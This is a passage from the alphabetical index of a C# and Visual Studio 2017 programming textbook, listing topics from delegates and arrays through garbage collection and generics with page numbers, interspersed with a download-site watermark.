function pointers compared to, 451
instantiating, 475
invoking, 454–455, 475
Download from finelybook [email protected]
1089
lambda expressions and, 464
method adapters, 464–465
overview, 450–451
performCalculationDelegate, 450–451
removing methods from, 455
events
declaring, 465–466, 475
event sources, 465
overview, 465
raising, 467, 469–475, 477
subscribing to, 466–467, 476
unsubscribing from, 467, 476
user interface, 468–469
applications. See also projects
console
creating in Visual Studio 2017, 3–14, 34
defined, 3
namespaces, 14–17
graphical, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
WPF App template, 33
indexers in, 372–378
AppStyles.xaml file, 646
App.xaml.cs file file, 28–30
Area method, 164, 190–191
Download from finelybook [email protected]
1090
areYouReady variable, 96
ArgumentException, 246, 257, 261–262, 285
ArgumentOutOfRangeException, 149, 237
arguments, 256–257. See also parameters (method)
in arrays, 256–257
EventArgs, 469
arithmetic operators
applying to int values, 49–54
associativity, 54–56, 98
checked versus unchecked integer arithmetic, 144–145
data types and, 47–49
overview of, 47
precedence, 54, 98
prefix and postfix forms, 56–57
Array class. See arrays
arrays. See also indexers
accessing elements of
single elements, 233, 252
value types, 249–251
arguments, 256–257
Cards project, 240–248
AddCardToHand method, 246
DealCardFromPack method, 243
dealClick method, 246
IsCardAlreadyDealt method, 244
IsSuitEmpty method, 243–244
for loop, 247–248
Pack class, 242–243
PlayingCard class, 241–242
randomCardSelector variable, 242
ToString method, 245
Value enumeration, 241
Download from finelybook [email protected]
1091
collections compared to, 427
copying, 236–238
declaring, 229–230, 252
defined, 229
empty, 231
finding number of elements in, 233, 252
implicitly typed, 232–233
indexers compared to, 369
initializing, 231–232, 252
instantiating, 230–231, 252
iterating through, 233–235, 252
jagged, 239–240, 253
Main method and, 236
multidimensional, 238, 253, 258
parameter
advantages of, 255
declaring, 257–259, 266
int data type in, 257–258
optional parameters compared to, 263–265
params object[]259–260
priority of, 259
quick reference, 266
Sum method used with, 260–263
passing as parameters, 235–236
populating, 231–232
quick reference, 252–253
returning from methods, 235–236
The Art of Computer Programming, Volume 3 (Knuth), 388
as operator, 202–203, 207
AsParallel method, 585–590, 608
ASP.NET Web API template, 722
assemblies
Download from finelybook [email protected]
1092
core, 17
defined, 7–8
namespaces and, 17
references for, 17
assignment operator, simple (=)
associativity, 54–56, 99
overview, 39
precedence, 99
assignment operators
compound
associativity, 116
examples of, 132
overview, 115–116
precedence, 116
table of, 116
simple assignment (=)
associativity, 54–56, 99
overview, 39
precedence, 99
associativity of operators, 503
arithmetic operators, 54–56
Boolean operators, 98–99
compound assignment operators, 116
table of, 98–99
asterisk (*)
compound multiplication (*=) operator, 116
multiplication (*) operator, 47
async keyword, 571–572, 608
asynchronous methods
common errors with, 579–580
defining, 608
async keyword, 571–572
Download from finelybook [email protected]
1093
await operator, 572–574
GraphDemo project, 575–577
return values, 578–579
IAsyncResult design pattern, 584–585
Main method and, 573
overview, 567, 568
problem solved by, 568–571
scalability and, 568
tasks and memory allocation, 582–583
Windows Runtime APIs and, 580–582
AuditingCompleteDelegate, 470
audit-nnnnnn.xml file, 458
Auditor class, 460, 470–475
AuditOrder method, 463, 471
AuditProcessingComplete event, 470–471
AuditService project, 459
automated factory scenario, delegates in, 453–456
automatic properties, 353–355, 358–359, 361
AutomaticProperties project, 358–359
await operator, 555, 564, 572–574, 608
Azure API app security, 729–730
B
Barrier class, 596
base keyword, 270, 275, 288
base16 notation, 364
base-class constructors, 270–271, 288
baseToConvertTo method, 285
BasicCollection<T> class, 443–444
BeginOperationName method, 584
BeginWrite method, 584
Download from finelybook [email protected]
1094
binary notation, 364
binary operators, 504
binary trees
binary tree class, 391–399
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
Tree<TItem> class, 392–399
InsertIntoTree method, 400–402
nodes, 388
subtrees, 388
theory of, 388–390
binary values
binary notation, 364
displaying, 365
hexadecimal notation, 364
manipulating, 365–366
obo prefix, 364
operators for, 365–366
storing, 364
BinarySearch method, 407
BinaryTree project, 392–396, 445–447
BinaryTreeTest project, 396–399
binding. See data binding
BitArray class, 412
bitwise operators, 365–366
Black.Hole method, 259–260
Blank App template, 615–617, 655
blocks
do statements, 124
if statements, 100–101
while statements, 118, 122
bool data type, 40
Download from finelybook [email protected]
1095
bool keyword, 215
bool variables, 95–96
Boolean expressions
creating, 112
in if statements, 99–100
overview, 95–96
Boolean operators
associativity, 98–99
conditional logical operators, 97
defined, 96
equality operators, 96
precedence, 98–99
relational operators, 96
short-circuiting, 97–98
Boolean variables, 95–96, 112
bottlenecks (CPU), identifying, 533–545
boxing, 199–200, 207
braces ({ }), 54, 62, 64, 179, 231, 252
brackets ([ ]), 54, 229, 252
Brake method, 280
break statement, 109, 124
Build Solution command (Build menu), 11, 34
BuildTree project, 400–402
Button class, 468
Button control, 24–25
byte keyword, 215
C
calculateClick method, 67, 69, 71, 143, 150, 152
calculateData method, 547–548
CalculateFactorial method, 83–84
Download from finelybook [email protected]
1096
calculateFee method, 76–77, 81, 89–92
CalculatePI project, 600–603
calculateValue method, 578
calculateValueAsync method, 578
Calculator class, 327–333
calling methods, 93
base-class constructors, 270–271, 288
constructors, 181
delegates, 454–455, 475
destructors, 335
generics, 409
multiple return values, 68–70, 93
from other objects, 68
syntax, 65–68
camelCase notation, 38, 163
CanBrowse property (ViewModel), 735
Canceled task status, 557
cancellation
PLINQ (Parallel LINQ) queries, 587–590
synchronization, 596–597
tasks, 551–561, 566
tokens, 551–552, 590
CancellationToken object, 551–552, 590
CancellationTokenSource object, 590, 610
CanExecute method, 675, 676–677
CanExecuteChanged event, 677–678
CanExecuteChanged method, 675
canExecuteChangedEventTimer_Tick method, 678
CanSaveOrDiscardChanges property (ViewModel), 735
canvases, 296
Car class, 280–281
Cards project, 240–248
Download from finelybook [email protected]
1097
AddCardToHand method, 246
collection classes, 427–431
DealCardFromPack method, 243
dealClick method, 246
IsCardAlreadyDealt method, 244
IsSuitEmpty method, 243–244
for loop, 247–248
Pack class, 242–243
PlayingCard class, 241–242
randomCardSelector variable, 242
ToString method, 245
Value enumeration, 241
cardsInSuit object, 428
caret (^), XOR operator, 366
cascading if statements, 101–106
case keyword, 107
case labels, 107–108
case sensitivity, 36
casting, 202
InvalidCastException, 201
is operator, 202
as operator, 202–203
quick reference, 207
switch statement, 203–204
catch statement
example of, 156
throw/catch blocks, 151–153
try/catch blocks
multiple catch handlers, 136–137
multiple exceptions, catching, 137–138
syntax, 134–135
when keyword, 138–142
Download from finelybook [email protected]
1098
catching exceptions, 156
multiple catch handlers, 136–137
multiple exceptions, 137–138
try/catch blocks, 134–135
when keyword, 138–142
char data type, 40
checked integer arithmetic, 144–145
expressions, 145
statements, 145
checked keyword, 144–145
checked expressions, 146–148
checked statements, 145
example of, 156
CheckoutButtonClicked method, 460, 462, 463, 469–470, 473
CheckoutController class, 460–463
CheckoutDelegate, 461
CheckoutProcessing delegate, 461
CheckoutService project, 461–463
CIL (Common Intermediate Language), 226
Circle class, 301–302
accessibility, 162
Area method, 190–191
automatic properties, 354–355
comparable, 391–393
constructors, 164–165
copying, 185–186
defining, 160–161
initializing, 189
NumCircles field, 174–175
partial class, 166
class keyword, 160–161
class methods. See static methods
Download from finelybook [email protected]
1099
classes. See also methods; objects; individual class names
abstract
abstract methods, 306
declaring, 314
defining, 305–306
implementing, 307–311
quick reference, 314
sealed classes, 306–307
sealed methods, 307
accessibility, 162–163
anonymous, 179–180
assigning, 271–273
class libraries, 391
Classes project, 166–172
collection classes
card game application, 427–431
defined, 411
Dictionary<TKey, TValue>412, 418–420
HashSet<T>412, 421–422
LinkedList<T>412, 415–416
List<T>412, 413–416
Queue<T>412, 416–417
SortedDictionary<TKey, TValue>420
SortedList<TKey, TValue>412, 420–421
Stack<T>412, 417–418
table of, 411–412
comparing operators in, 509–510
concurrent collection
ConcurrentBag<T>597
ConcurrentDictionary<TKey, TValue>597
ConcurrentQueue<T>597
ConcurrentStack<T>597
Download from finelybook [email protected]
1100
thread-safe data access, 598–607
constructors, overloading, 164–165
copying, 185–186, 206
declaring, 180
defining, 160–161
encapsulation
implementing, 339–341
purpose of, 160
fields, 162
generalized
creating with generics, 384–387
creating with object type, 381–384
vs. generics, 387
generic
binary tree class, 391–399
binary tree theory, 388–390
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
indexers in, 379
inheritance, 268
naming guidelines, 163
objects compared to, 161
partial, 165–172
private, 162–163
public, 162–163
purpose of, 159–160
quick reference, 180–181
referencing through interfaces, 292–293
scope, 72
sealed, 306–307, 314
static, 175–176
static fields in
Download from finelybook [email protected]
1101
creating, 175
shared, 174–175
structures compared to, 217–218
Windows Runtime compatibility, 311–313
Classes project, 166–172
classification, 159–160
Clone method, 185–186, 237–238
CLR (common language runtime), 85, 226, 311
code, managed, 226
code, native, 226
Code and Text Editor window, 6
code view, 18
Collect method, 320, 335
collections
arrays compared to, 427
collection classes
card game application, 427–431
defined, 411
Dictionary<TKey, TValue>412, 418–420
HashSet<T>412, 421–422
LinkedList<T>412, 415–416
List<T>412, 413–416
Queue<T>412, 416–417
SortedDictionary<TKey, TValue>420
SortedList<TKey, TValue>412, 420–421
Stack<T>412, 417–418
table of, 411–412
concurrent collection classes
ConcurrentBag<T>597
ConcurrentDictionary<TKey, TValue>597
ConcurrentQueue<T>597
ConcurrentStack<T>597
Download from finelybook [email protected]
1102
thread-safe data access, 598–607
creating, 432
elements of
adding, 413, 415, 419, 420, 421, 432
finding number of, 432
iterating through, 414, 415–416, 419, 420, 433
locating, 415, 433
removing, 413, 415, 421, 432
enumerating
EnumeratorTest project, 442–443
IEnumerable interface, 436, 441–443
IEnumerator<T> interface, 436
iterators, 443–447
manual enumerator implementation, 437–440
overview, 435–436
quick reference, 448
Find methods, 423–425
initializers, 422–423
iterating through
parallelized query, 587–590
parallelized query over simple collection, 585–587
lambda expressions
anonymous methods and, 426–427
defined, 423–424
features of, 426
forms of, 425–426
syntax, 424–425
pointsList, 605
predicates, 423–425
quick reference, 432–433
System.Collections namespace, 412
thread-safe, 605–606
Download from finelybook [email protected]
1103
Collections namespace, 412
COM (Component Object Model), 85
ComboBox control, 624–625, 669–671
Command class, 675–678
Command element (CustomerVoiceCommands.xml), 688
CommandBar control, 683
commands
adding to ViewModel, 675–685
ICommand interface, 675–678, 701
NextCustomer command, 679–682
Next/Previous buttons, 682–685
PreviousCustomer command, 679–682
NextCustomer, 679–682
PreviousCustomer, 679–682
CommandSet element (CustomerVoiceCommands.xml), 688
comments, TODO, 167
Common Intermediate Language (CIL), 226
common language runtime (CLR), 85, 226, 311
Compare method, 106, 406
compareClick method, 103–104
CompareTo method, 290, 391, 395, 492
comparing
dates
Compare method, 106
dateCompare method, 102–106
operators, 509–510
Complex class, 514–516, 519–521
Complex type, 511
ComplexNumbers project, 511–514
Component Object Model (COM), 85
compound assignment operators
associativity, 116
Download from finelybook [email protected]
1104
checked expressions, 146
delegates and, 455
evaluation of, 507–508
events and, 466, 476
examples of, 132
overview, 115–116
precedence, 116
quick reference, 132
table of, 116
computer memory. See memory
concatenating strings, 47–48
concurrent access to data, synchronizing
concurrent collection classes
ConcurrentBag<T>597
ConcurrentDictionary<TKey, TValue>597
ConcurrentQueue<T>597
ConcurrentStack<T>597
locked data, 593–594
overview, 590–593
synchronization primitives for coordinating tasks, 593–594, 596–597
thread-safe data access, implementing, 598–607
concurrent collection classes
ConcurrentBag<T>597
ConcurrentDictionary<TKey, TValue>597
ConcurrentQueue<T>597
ConcurrentStack<T>597
thread-safe data access, implementing, 598–607
ConcurrentBag<T> class, 597
ConcurrentDictionary<TKey, TValue> class, 597
ConcurrentQueue<T> class, 597
conditional logical operators, 97
Configure App Service Plan dialog box, 725
Download from finelybook [email protected]
1105
Console Application template, 4
console applications
creating in Visual Studio 2017, 3–14, 34
building and running, 11–14
files, 7–8
IntelliSense icons, 11
Main method, 8–10
defined, 3
namespaces
assemblies and, 17
bringing into scope, 15
defining classes in, 14–15
longhand names, 16
Console class
ReadLine method, 76
Write method, 76
WriteLine method, 73
Console.WriteLine method, 40, 214, 255–256, 260
const fields, 175
const keyword, 175
constantExpression identifier, 107–108
constraints
generics, 387, 408
operator, 504
constructors
base-class, 270–271, 288
calling, 181
declaring, 163–164, 180
default, 164
order of, 165
overloading, 164–165
public versus private, 164
Download from finelybook [email protected]
1106
Contains method, 433
continuations, task, 530–531, 563–564, 565
continue statement, 124
ContinueWith method, 530–531, 565
contravariance, generic interfaces and, 406–408, 409
Controller class, 453–456
controls. See also classes; user interfaces
AppBarButton, 683
Button, 24–25
ComboBox, 624–625, 669–671
CommandBar, 683
Grid, 655
adapted layout with Visual State Manager, 640–643
background, 647–648
in scalable user interface, 619–620
tabular layout with, 630–639
ProgressRing, 747
Rectangle, 659
TextBlock
adding to forms, 21–24
in scalable user interface, 620–622, 625–626
styles applied to, 649–651
TextBox
data binding in, 661, 664–665
in scalable user interface, 622–624, 625–626
conversion operators
built-in, 517
narrowing conversions, 517
overview, 516–517
user-defined, 518
widening conversions, 517
writing, 519–521, 522
Download from finelybook [email protected]
1107
converting strings to integers, 59
ConvertToBase method, 285–287
Convert.ToChar method, 127
Convert.ToString method, 365, 378
cooperative cancellation of tasks, 551–561, 566
copies
deep, 185, 238
shallow, 185
Copy method, 237
CopyCustomer method, 736
copying
arrays, 236–238
classes, 185–186, 206
shallow, 237–238
structure variables, 223
value types, 183–189, 206, 216
copyOne method, 110–111
CopyTo method, 237
core assemblies, 17
cores, processor, 526–527
Cortana searches
quick reference, 701
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice activation, 691–695
Count method, 490
Count property (collections), 432
CountdownEvent class, 595
covariance, generic interfaces and, 404–405, 409
CPU bottlenecks, identifying, 533–545
Download from finelybook [email protected]
1108
Create App Service dialog box, 726
Created task status, 556
.csproj file extension, 41
curly brackets ({ }), 54
Current property
IEnumerable interface, 436, 440
ViewModel class, 673
currentCustomer variable, 673
currentNodeValue variable, 395
Customer class, 659–660, 665–668
CustomerOperationsExtension class, 728
Customers application, 734–740
adapting with Visual State Manager, 639–645
adding commands to, 675–685
Command class, 675–678
NextCustomer command, 679–682
Next/Previous buttons, 682–685
PreviousCustomer command, 679–682
building with Blank App template, 615–617
Cortana searches
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice activation, 691–695
displaying data with data binding, 658–664
error reporting, 742–746
scalable user interface, 618–627
ComboBox control, 624–625
Grid control, 619–620
TextBlock control, 620–622, 625–626
TextBox control, 622–624, 625–626
Download from finelybook [email protected]
1109
styles applied to, 646–654
tabular layout, 630–639
UI updates, 746–749
CustomersController class, 719–722
CustomersInMemory class, 588
CustomersOperations class, 728
CustomerVoiceCommands.xml file, 687–690
D
DailyRate project
application logic, 73–74
method declarations, 74–77
optional parameters and named arguments, 88–92
stepping through, 78–81
dangling references, 251, 319
data
aggregating, 485–487
displaying, 658–664
filtering, 484–485, 501
grouping, 485–487, 501
joining, 487–488, 502
modifying with data binding, 664–669
INotifyPropertyChanged interface, 665–668, 700
nameof operator, 668–669
two-way data binding, 664–665, 700
ordering, 485–487, 501
privacy, 185–186
retrieving with REST web services, 703–709, 726–732, 750
creating, 718–724
deploying to Azure, 724–726
retrieving data with, 726–732
Download from finelybook [email protected]
1110
searching for with Cortana
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
voice activation, 691–695
selecting, 482–484, 501
data access
concurrent access to data, synchronizing
canceling synchronization, 596–597
concurrent collection classes, 597
locked data, 593–594
overview, 590–593
synchronization primitives for coordinating tasks, 594–596
parallelizing. See parallelism
remote databases, 703. See also REST (Representational State Transfer)
web services
data retrieval, 703–709
Entity Framework, 704
entity model, creating, 709–717, 750
quick reference, 750–751
thread-safe, 598–607
data binding, 643
with ComboBox control, 669–671
displaying data with, 658–664
INotifyPropertyChanged interface, 665–668, 700
modifying data with, 664–669
INotifyPropertyChanged interface, 665–668, 700
nameof operator, 668–669
two-way data binding, 664–665, 700
nameof operator, 668–669
quick reference, 700–701
two-way, 664–665, 700
Download from finelybook [email protected]
1111
data types. See value types
database-first approach to entity modeling, 710
databases, remote. See remote databases, accessing
DataTypes project, 459
Date structure, 220–221
dateCompare method, 102–106
dates, comparing
Compare method, 106
dateCompare method, 102–106
deadlocks, 580
DealCardFromPack method, 243
dealClick method, 246
Debug mode
applications, building and running, 13, 70, 90
exception settings, 148
iteration statements, stepping through, 127–131
methods, stepping through, 78–81
Debug toolbar, 94
decimal data type, 40
decimal keyword, 215
decision statements
Boolean operators
associativity, 98–99
conditional logical operators, 97
defined, 96
equality operators, 96
precedence, 98–99
relational operators, 96
short-circuiting, 97–98
Boolean variables, declaring, 95–96
if
blocks, 100–101
Download from finelybook [email protected]
1112
cascading, 101–106
common errors in, 100
syntax, 99–100, 112–113
when to use, 99
quick reference, 112–113
switch
rules for, 108–109
SwitchStatement exercise, 109–112
syntax, 107–108, 113
when to use, 107
declaring. See also defining
arrays, 229–230, 252
classes, 180
abstract, 306, 314
sealed, 306–307, 314
constructors, 180
delegates, 450–451, 454, 456–464, 475
enumerations, 210, 227
events, 465–466, 475
inheritance, 288
interface properties, 348–349
methods, 62–63, 93
constructors, 163–164
extension, 283–287, 288
new methods, 273–274
override, 275–276, 288
static, 181
valid keyword combinations, 313
virtual, 274–275, 277, 288
namespaces, 616
operators
conversion, 518
Download from finelybook [email protected]
1113
decrement (--), 508–509
increment (++), 508–509
overloaded, 504–505
pairs of, 510
symmetric, 506–507, 519
parameter arrays, 257–259, 266
properties
automatic, 353–355, 358–359, 361
interface, 361
read-only, 345, 360
static, 344
syntax, 341–342, 360
write-only, 345, 360
structures, 216, 227
variables
Boolean, 95–96, 112
enumeration, 210–211, 227
structure, 218, 227
syntax, 38–39, 59
deconstructing objects, 172–173
deconstructors, 172–173
decrement (--) operator, 59, 116, 146, 508–509
decrement operator (--), 56–57
decrementing variables, 56–57, 59, 116
deep copies, 185, 238
default constructors, 164
default keyword, 107, 441
deferred evaluation, LINQ (Language-Integrated Query) and, 497–500
defining. See also declaring
asynchronous methods, 608
async keyword, 571–572
await operator, 572–574
Download from finelybook [email protected]
1114
common errors, 579–580
GraphDemo project, 575–577
problem solved by, 568–571
return values, 578–579
classes, 160–161
abstract, 305–306, 314
sealed, 306–307, 314
interfaces, 290–291, 296–304, 314
method parameters
optional parameters, 86, 94
syntax, 62
method scope
class, 72
local, 71
definite assignment rule, 40
delegate keyword, 454, 475
delegates. See also events
Action<T, …>452
adding methods to, 455
in automated factory scenario, 453–456
declaring, 450–451, 454, 456–464, 475
defined, 450
examples of, 451–452
Func, 451–452
Func<T, …>452
function pointers compared to, 451
instantiating, 475
invoking, 454–455, 475
lambda expressions and, 464
method adapters, 464–465
overview, 450–451
performCalculationDelegate, 450–451
Download from finelybook [email protected]
1115
quick reference, 475
removing methods from, 455
Delegates project
delegates, 457–460
events, 470–475
DELETE requests, 733
DeleteCustomer method, 721
DeliveryService project, 459
deploying REST web services, 724–726, 750
Dequeue method, 382–384, 411–412, 432
derived classes, declaring, 268
DerivedClass, 268
Design Patterns (Gamma et al), 465
design view, 18
destroying objects, 316
destructors. See also garbage collection
restrictions on, 317–318
writing, 316–318, 335
Dictionary<TKey, TValue> class, 412, 418–420
directives. See statements
DiscardChanges command, 738
Dispatcher object, 571
DispatcherTimer class, 678
displayData method, 119–121
displaying data with data binding, 658–664
displayMessage method, 473–474
disposal methods, 321–322
Dispose method, 120, 154–155, 324–326, 440
GarbageCollectionDemo project, 329–331
preventing objects being disposed of more than once, 330–332
thread safety and, 332–333
DistanceTo method, 170–171
Download from finelybook [email protected]
1116
Distinct method, 487, 490
Divide method, 68–70, 327
DivideByZeroException, 152, 563
divideValues method, 53
division (/) operator, 47
do statements
blocks, 124
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
doAdditionalProcessing method, 592–593, 602
doAuditing method, 471
Document Outline window, 50
Documents folder, 5
doFirstLongRunningOperation method, 573–574
doIncrement method, 193–194
doInitialize method, 195
doMoreAdditionalProcessing method, 592
doMoreWork method, 530
doSecondLongRunningOperation method, 570
doShipping method, 472
DoStatement project, 125–131
dot notation, 284
dot operator (.), 316
doThirdLongRunningOperation method, 570
double data type, 39, 40
converting int to, 517
converting to int, 517
double keyword, 215
double quotation marks (")
as delimiters, 111
Download from finelybook [email protected]
1117
in XML, 109
doWork method
Classes project, 166–167, 168–169
ComplexNumbers project, 513, 516
ExtensionMethod project, 286
optional parameters, 265
Parameters project, 187, 196
QueryBinaryTree project, 493–496
StructsAndEnums project, 213–214, 222–223, 224
Vehicles project, 280–281
DoWorkWithData method, 85–86
Draw method, 299, 301
Drawing project
abstract classes, 307–311
interfaces, 296–304
properties, 349–353
drawingCanvas_Tapped method, 302–303, 351–353
DrawingShape class, 308–311, 349–353
Drive method, 280
E
Edit menu commands, Find and Replace, 43
Edit method, 738
EditCustomer command, 738
editing databases, 733–741
elements of arrays
accessing, 233, 252
empty arrays, 231
finding number of, 233, 252
iterating through, 233–235, 252
elements of collections
Download from finelybook [email protected]
1118
adding, 432
Dictionary<TKey, TValue>419
HashSet<T>421
LinkedList<T> class, 415
List<T> class, 413
SortedDictionary<TKey, TValue>420
finding number of, 432
iterating through, 433
Dictionary<TKey, TValue>419
LinkedList<T> class, 415–416
List<T> class, 414
SortedDictionary<TKey, TValue>420
locating, 415, 433
removing, 432
HashSet<T>421
LinkedList<T> class, 415
List<T> class, 413
Employee class, 491–492
empty arrays, 231
empty strings, 376
encapsulation
implementing, 339–341
purpose of, 160
EndOperationName method, 584
EndWrite method, 584
Enqueue method, 382–384, 411–412
EnterReadLock method, 595, 609
EnterWriteLock method, 595, 609
Entity Data Model Wizard, 712–716
Entity Framework, 704
entity models, creating, 709–717, 750
enum keyword, 210, 227
Download from finelybook [email protected]
1119
enum types. See enumerations
enumeration variables
assigning to values, 227
declaring, 210–211, 227
operators and, 211
enumerations
of collection elements
EnumeratorTest project, 442–443
IEnumerable interface, 436, 441–443
IEnumerator<T> interface, 436
iterators, 443–447
manual enumerator implementation, 437–440
overview, 435–436
quick reference, 448
declaring, 210, 227
enumeration variables
assigning to values, 227
declaring, 210–211, 227
operators and, 211
literal names, 210
literal values, 211
nullable, 210
overview, 209
quick reference, 227
Season
declaring, 210
enumeration variables, declaring, 210–211
StructsAndEnums project, 212–214
TaskContinuationOptions, 530–531
TaskCreationOptions, 530
underlying types, 212
Value, 241
Download from finelybook [email protected]
1120
enumerators
defining, 445–447
IEnumerable interface, 436, 441–443
IEnumerator<T> interface, 436
iterators
defined, 443
defining enumerators with, 445–447
simple example, 443–445
manual implementation, 437–440
quick reference, 448
EnumeratorTest project, 442–443
equal sign (=)
assignment (=) operator, 39
associativity, 54–56, 99
precedence, 99
equality (==) operator, 96, 99, 112, 510
lambda (=>) operator, 64, 425
equality (==) operator, 96, 99, 112, 510
Equals method, 216, 510, 514
equals operator, 490
error reporting, database, 742–746
errors. See exceptions
EventArgs argument, 469
events, 465–466. See also delegates
declaring, 465–466, 475
event sources, 465
overview, 465
quick reference, 475–477
raising, 467, 469–475, 477
subscribing to, 466–467, 476
unsubscribing from, 467, 476
user interface, 468–469
Download from finelybook [email protected]
1121
exceptions, 133–134
AggregateException, 562–563, 565
ArgumentException, 246, 257, 261–262, 285
ArgumentOutOfRangeException, 149, 237
catching
example of, 156
multiple catch handlers, 136–137
multiple exceptions, 137–138
try/catch blocks, 134–135
when keyword, 138–142
checked versus unchecked arithmetic, 144–145
expressions, 146–148
statements, 145
DivideByZeroException, 152, 563
filtering, 138–142
FormatException, 134–135
IndexOutOfRangeException, 233, 563
inheritance hierarchies, 137
InvalidCastException, 201, 384, 404
InvalidOperationException, 151–152, 153, 413, 440
NotImplementedException, 243, 299, 439
NullReferenceException, 190
OperationCanceledException, 559–560, 596
OutOfMemoryException, 198, 238
OverflowException, 135, 144–149, 517
checked expressions, 146–148
checked statements, 145
propagating, 142–144
quick reference, 156
StackOverflowException, 344
throwing
catch handler, 151–153
Download from finelybook [email protected]
1122
example of, 156
finally blocks, 154–155
throw exceptions, 153–154
throw statement, 149–153
unhandled, 135–136
verifying disposal after, 333–334
Visual Studio debugger settings, 148
exception-safe disposal, 322–323, 326–328, 335
ExceptWith method, 421
exclamation mark (!)
inequality (!=) operator, 96, 99, 112, 510
NOT (!) operator, 96
Execute method, 675, 676–677
exiting loops
break statement, 124
continue statement, 124
ExitReadLock method, 595, 609
ExitWriteLock method, 595, 609
explicit conversions, 517
explicit interface implementation, 293–295
explicit keyword, 518, 522
expression-bodied methods, 64–65, 93
expressions. See also IEnumerable interface
Boolean, 95–96
creating, 112
in if statements, 99–100
overview, 95–96
checked/unchecked, 146–148
lambda expressions
anonymous methods and, 426–427
defined, 423–424
delegates and, 464
Download from finelybook [email protected]
1123
features of, 426
forms of, 425–426
syntax, 424–425
LINQ query expressions
data aggregation, 485–487
data filtering, 484–485, 501
data grouping, 485–487, 501
data joins, 487–488, 502
data ordering, 485–487, 501
data selection, 482–484, 501
deferred evaluation, 497–500
examples of, 480–482
order of, 491
overview, 479–480
query operators, 489–491
quick reference, 501–502
Tree<TItem> objects and, 491–497
properties in, 344
quick reference, 59
Extensible Application Markup Language. See XAML (Extensible
Application Markup Language)
Extensible Markup Language (XML), special characters in, 109
extension, interface, 292
extension methods, declaring, 283–287, 288
ExtensionMethod project, 285–287
Extract Method Wizard, 78
extracting methods, 78
F
factorial method, 83–84
Factorial project, 82–84
Download from finelybook [email protected]
1124
fall-through (switch statements), 109
fast Fourier transform (FFT), 602
faulted tasks
continuations with, 563–564
Faulted task status, 557
Feedback element (CustomerVoiceCommands.xml), 689
FFT (fast Fourier transform), 602
fields
naming conventions, 343–344
public versus private, 162
static
accessing, 181
creating, 175, 181
shared, 174–175
File menu commands, New, 4
FileOpenPicker class, 581
FileProcessor class, 317
files
App.config, 8
AppStyles.xaml, 646
audit-nnnnnn.xml, 458
.csproj format, 41
CustomerVoiceCommands.xml, 687–690
graphical application
App.xaml.cs file, 28–30
MainPage.xaml.cs, 27–28
mscorlib.dll, 17
Package.appxmanifest, 614
Properties, 7
.sln format, 41
stdarg.h, 258
VCD (voice-command definition) files, 687–690
Download from finelybook [email protected]
1125
FillList method, 443
filtering
data, 484–485, 501
exceptions, 138–142
finalization, 320
Finalize method, 318
finally blocks, 154–155, 156, 318, 322
Find and Replace command (Edit menu), 43
Find method, 423–425, 433, 451
FindAll method, 423
findByNameClick method, 375
findByPhoneNumberClick method, 376
FindLast method, 423
FindValueAsync method, 582–583
float data type, 39, 40
float keyword, 215
folders
Documents, 5
References, 7–8
For method
syntax, 565
when to use, 545–546
forcing garbage collection, 320, 335
foreach statement
arrays, iterating through, 234–235, 252
canceling, 557–558
collections, iterating through, 433, 448
Dictionary<TKey, TValue>419
LinkedList<T> class, 415
List<T> class, 413
Stack<T> class, 417–418
ForEach<T> method, 546, 565
Download from finelybook [email protected]
1126
FormatException, 134–135
forms. See Customers application
forward slash (/)
compound division (/=) operator, 116
division (/) operator, 47
freachable queue, 320–321
"free format" languages, 36
from operator, 489, 501
frozen applications, 580
Func delegate, 451–452
Func type, 676
Func<T, …> delegates, 452
function pointers, 451
G
garbage collection. See also destructors
advantages of, 318–320
finalization, 320
forcing, 320, 335
freachable queue, 320–321
how it works, 320–321
object lifetimes and, 319
overview, 189–190
quick reference, 335
resource management
disposal methods, 321–322
Dispose method, 324–326
exception-safe disposal, 322–323, 326–328, 335
IDisposable interface, 324, 328–330
preventing objects being disposed of more than once, 330–332
thread safety, 332–333
Download from finelybook [email protected]
1127
using statements, 323–324, 335
verifying disposal after exception, 333–334
when to use, 321
GarbageCollectionDemo project, 326–333
GC.Collect method, 320, 335
GC.SuppressFinalize method, 331
GDI (Graphics Device Interface) libraries, 33
generalized classes
creating with generics, 384–387
creating with object type, 381–384
vs. generics, 387
Generate Method Stub Wizard, 74–77, 93
generateGraphData method, 534, 541–543, 547, 554, 559
generateGraphDataAsync method, 576–577
generateResult method, 580
Generic namespace, 386–387, 411
generics
classes
binary tree class, creating, 391–399
binary tree theory, 388–390
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
constraints, 387, 408
vs. generalized classes, 387
generalized classes, creating, 384–387
interfaces
contravariance, 406–408, 409
covariance, 404–405, 409
variance, 402–404
methods
calling, 409
creating, 399–400, 408
Download from finelybook [email protected]
1128
InsertIntoTree, 400–402
purpose of, 384–387
quick reference, 408–409
System.Collections.Generic namespace, 386
gestures, 612–613
get accessor method
indexers, 368–369, 379
interface properties, 348–349
properties, 342–343
GetCachedValue method, 583
GetCustomer method, 721
GetCustomers method, 721, 723
GetEnumerator method, 436, 444, 446
GetHashCode method, 406, 510, 515
global methods, lack of support for, 62
globally unique identifiers (GUIDs), 741
goto statement, 109
GraphDemo project
asynchronous methods, 575–577
parallelism
implementing, 532–538
Parallel class, 547–549
task cancellation, 553–557, 560–561
graphical applications, creating in Visual Studio 2017, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
Download from finelybook [email protected]
1129
WPF App template, 33
Graphics Device Interface (GDI) libraries, 33
greater than (>) operator, 96, 99, 112
greater than or equal to (>=) operator, 96, 99, 112
Grid controls, 655
adapted layout with Visual State Manager, 640–643
background, 647–648
scalable user interface with, 619–620
tabular layout with, 630–639
group by operator, 489, 501
GroupBy method, 486, 495, 501
grouping data, 485–487, 501
GUIDs (globally unique identifiers), 741
H
Hand class, 430
Handle method, 562, 565
